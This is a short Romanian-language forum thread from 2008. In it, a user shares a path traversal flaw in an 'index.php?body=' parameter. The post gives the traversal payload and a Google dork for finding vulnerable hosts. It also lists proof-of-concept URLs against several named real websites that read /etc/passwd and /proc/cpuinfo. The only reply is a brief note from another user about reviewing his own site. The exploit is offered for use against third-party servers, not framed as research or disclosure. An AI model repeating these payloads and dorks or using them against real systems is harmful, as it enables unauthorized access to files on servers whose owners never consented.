shinnok Posted March 24, 2008 Report Posted March 24, 2008 O mica vulnerabilitate cu care m-am distrat in seara asta:- "index.php?body=" este partea vulnerabila.- "../../../../../../../../../../[director]" este ceea ce treb trimis lui body - "inurl:"index.php?body="" este google dorkul care va ajuta sa gasiti hosturi posibil vulnerabile- POC:http://www.exclusivestates.com/index.php?body=../../../../../../../../../../etc/passwdhttp://www.waterqualityplan.org/index.php?BODY=../../../../../../../../../../etc/passwdhttp://gp2.ro/ini/index.php?body=../../../../../../../../../../etc/passwdhttp://gp2.ro/ini/index.php?body=../../../../../../../../../../proc/cpuinfohttp://www.renaissanceink.net/index.php?body=../../../../../../../../../../etc/passwdhttp://www.heritagecovenant.org/index.php?body=../../../../../../../../../../etc/passwdPS:nu stiu de cat timp circula vulnerabilitatea,daca cineva stie sa posteze Quote
indexexplorer Posted March 24, 2008 Report Posted March 24, 2008 hmmm... cred ca trebuie sa-mi revizuiesc sursa site-ului...ms Quote
